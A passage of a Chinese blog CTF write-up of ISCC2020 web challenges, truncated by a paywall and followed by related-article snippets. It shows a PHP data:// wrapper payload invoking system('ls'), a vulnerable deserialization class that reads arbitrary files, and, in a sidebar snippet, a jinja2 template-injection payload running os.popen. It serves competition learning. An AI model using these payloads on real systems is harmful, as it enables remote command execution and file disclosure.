ISCC2020-Web题解

最新推荐文章于 2022-06-05 22:41:02 发布
最新推荐文章于 2022-06-05 22:41:02 发布
阅读量2.2k 收藏 6
点赞数 1
分类专栏: CTF_Writeup 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43431158/article/details/106160356
版权
本文详细解析了ISCC2020网络安全竞赛中的Web题目,包括PHP伪协议利用、反序列化漏洞、时间盲注解题过程、加密算法解密以及文件上传与包含、SQL注入和命令执行等技术细节。
摘要由CSDN通过智能技术生成

前言:

Where is file?-1

——php伪协议
在这里插入图片描述
考察的是php伪协议,可以使用data协议来进行读取

?file=data:text/plain,<?echo system('ls')?>

阿森的爱情-1

——签到

扫描一下出一个文件,里面就有flag

Php is the best language

——PHP反序列化、to_string魔法函数的调用

<?php  
@error_reporting(1);
include 'flag.php';
class baby 
{
   
    public $file;
    function __toString()      
    {
   
        if(isset($this->file))
        {
   
            $filename = "./{$this->file}";
            if (base64_encode(file_get_contents($filename)))
            {
   
                return base64_encode(file_get_contents($filename));
            }
        }
    }
}
if (isset($_GET['data']))
{
   
    $data = $_GET['data'];
        $good = unserialize($data);
        echo $good;
}
else 
{
   
    $url='./index.php';
}

$html='';
if(isset($_POST['test'])){
   
    $s = $_POST['test'];
    $html.="<p>谢谢参与!</p>";
}
?>

代码很简单,就是__toString的调用

<?php  
class baby 
{
   
    public $file;
    function __toString()      
    {
   
        if(isset($this->file))
        {
   
            $filename = "./{$this->file}";
            if
最低0.47元/天 解锁文章
lemonl1
关注
专栏目录
ISCC2021 LOCKK题解
LJFYYJ的博客
07-25 1531
变种AES解密 IDA动态调试so
ISCC2021-Re部分题解
Nobug_的博客
06-07 496
ISCC2021 RE wp 文章目录ISCC2021 RE wp练武题0x00 Garden0x01 Analysis 练武题 0x00 Garden 题目描述: 花园里藏了一个小宝贝,你能找到他吗? pyc文件直接反编译然后看源码 在线工具 异或顺序随便换 但是最后的结果不变,相异为一,相同为零。 f= '2(88\x006\x1a\x10\x10\x1aIKIJ+\x1a\x10\x10\x1a\x06' flag=" for i in f: flag+=chr(ord(i)^123)
iscc_2018 web题解
Smity的博客
10-25 2281
一切都是套路 开头比较客气,试了.bak .swp .svn都没有出来,结果发现是.txt,还是自己想复杂了 典型的变量覆盖漏洞,不用想了,直接先将flag的值赋给flag的值赋给flag的值赋给_200变量,然后利用die($_200)将flag打印出来。 你能绕过吗 id那里是只允许输入int吧我估计。。。什么十六进制或者其他的字母都认不出来,可能我水平不够想不到其他注入了。 我...
ISCC web题复现
m0_62422842的博客
06-05 1497
第一次参加ISCC线上赛,感觉题目质量还是挺好的,擂台赛都是大佬们的主场,向我这样的小白也只能学学新东西。在此总结做过的web题目以及相关知识点。
ISCC2020练武题Web总结
qwzf
06-06 2872
前言 接下来,继续总结练武题的WebWeb MISC
ISCC2020部分wp
Atkx's Blog
07-10 857
1. LSB 下载压缩包,解压得到一个图片 用Stegsolve打开,进行异或 在通道为0时发现了异常 将所有通道设为0,然后保存为flag.png 打开图片,发现是二维码 扫描后得到cumtctf{1sb_i4_s0_Ea4y} 2.
ISCC(web)暴力破解
Watson的博客
05-23 685
web2 暴力破解 题目地址:http://39.100.83.188:8002 发现这是一个已经给了用户名 只需要破解三位数字密码即可 有验证码需要通过验证码 随便输入一个密码 将验证码输入进去 通过burp抓包然后爆破 如下(输入完之后先不要点击submit) 此时,打开burp,设置好代理(这里不懂的自己查一下burp使用教程,里边有详细介绍) 然后点击submit 你会看到burp...
ISCC2021-MISC部分题目.zip
08-07
ISCC2021-MISC部分题目.zip是一个与ISCC(International Symposium on Computer Science and Convergence,国际计算机科学与融合大会)相关的压缩包文件。这个压缩包可能包含了该会议的多份论文、研究报告或者竞赛...
ISCC-2020-J07
03-26
【标题】"ISCC-2020-J07"是一个可能代表某个IT竞赛或项目的标识符,可能是2020年ISCC(International Symposium on Computer and Communication)的一部分,分类为J07,这通常意味着它属于特定的技术或研究领域。...
ISCC-2020-J06
02-14
标题“ISCC-2020-J06”可能指的是一个特定的项目、研究或活动,其中“ISCC”可能是“International Symposium on Computer and Communication”的缩写,这可能是一个关于计算机与通信领域的国际研讨会。而“2020”则...
2020易霖博杯 web wp.md
04-02
2020易霖博杯 web wp. 参照大佬们比较好的思路写的WP 方便学习
ISCC2019个人挑战赛题目练习
05-05
为了让大家能够拿到题目练习,增强网络安全技术和大赛经验的积累,可以下载这些题目来练习。解题思路在我的博客。
ISCC2020 擂台题Web总结与复现
qwzf
06-30 669
擂台Web1:Easy Injection 题目难度:简单 考察:python模板注入(jinja2模板注入) 典型的模板注入,无任何过滤,直接构造利用payload: http://101.201.126.95:7050/{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }} http://101.201.126.95:7050/{{ config.__class__.__init__.__globals__['os'].p
2019_iscc_pwn350
Jc
05-26 524
引 1.这个道题有两个考察点 一个是ret2dl的了解(只要看过这个技术的,都知道哪里只需要拿过来使用就可以了)还有一个就是main函数末尾的堆栈平衡(自己在这里卡了好久) offset 相信解决的offset的大小,这道题有迎刃而解了(先补充一个知识点,对于新手) 1.第一个图是pwn350 第二个图是普通的main函数结尾处 2.IDA手动输入一下,会发现 ...
php反序列化总结(二)
qq_43801002的博客
05-17 559
反序列化与POP CHAIN POP CHAIN:把魔术方法作为最开始的小组件,然后在魔术方法中调用其他函数(小组件),通过寻找相同名字的函数,再与类中的敏感函数和属性相关联,就是POP CHAIN 。此时类中所有的敏感属性都属于可控的。当unserialize()传入的参数可控,便可以通过反序列化漏洞控制POP CHAIN达到利用特定漏洞的效果。 通俗点就是:反序列化中,如果关键代码不在魔术方法中,而是在一个类的普通方法中。这时候可以通过寻找相同的函数名将类的属性和敏感函数的属性联系起来。 举一个小例子
nssctf刷题
weixin_63231007的博客
04-30 1142
[ZJCTF 2019]NiZhuanSiWei <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'
PHP反序列化练习册
qwsn
11-19 2642
1、XCTF平台:https://adworld.xctf.org.cn/task 高阶:1.unserialize3 高阶:2.Web_php_unserialize 2、BUUCTF平台:https://buuoj.cn/challenges Web类:4.[安洵杯 2019]easy_serialize_php Web类:5.[ZJCTF 2019]NiZhuanSiWei Basic类:6.BUU CODE REVIEW 1 Web类:7.[网鼎杯 2020 青龙组]AreUSerialz Web
ISCC(web)
Watson的博客
05-22 563
web4 地址: <?php error_reporting(0); include("flag.php"); $hashed_key = 'ddbafb4eb89e218701472d3f6c087fdf7119dfdd560f9d1fcbe7482b0feea05a'; $parsed = parse_url($_SERVER['REQUEST_URI']); /*理解p...
2021-05 ISCC竞赛
m0_53146110的博客
05-23 4869
2021-05 ISCC 练武题 这ISCC比赛,还是参加的以一个网络安全方面的竞赛,会的东西不多,碰运气的成分有不少。这里写几个已经解出来的题目。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值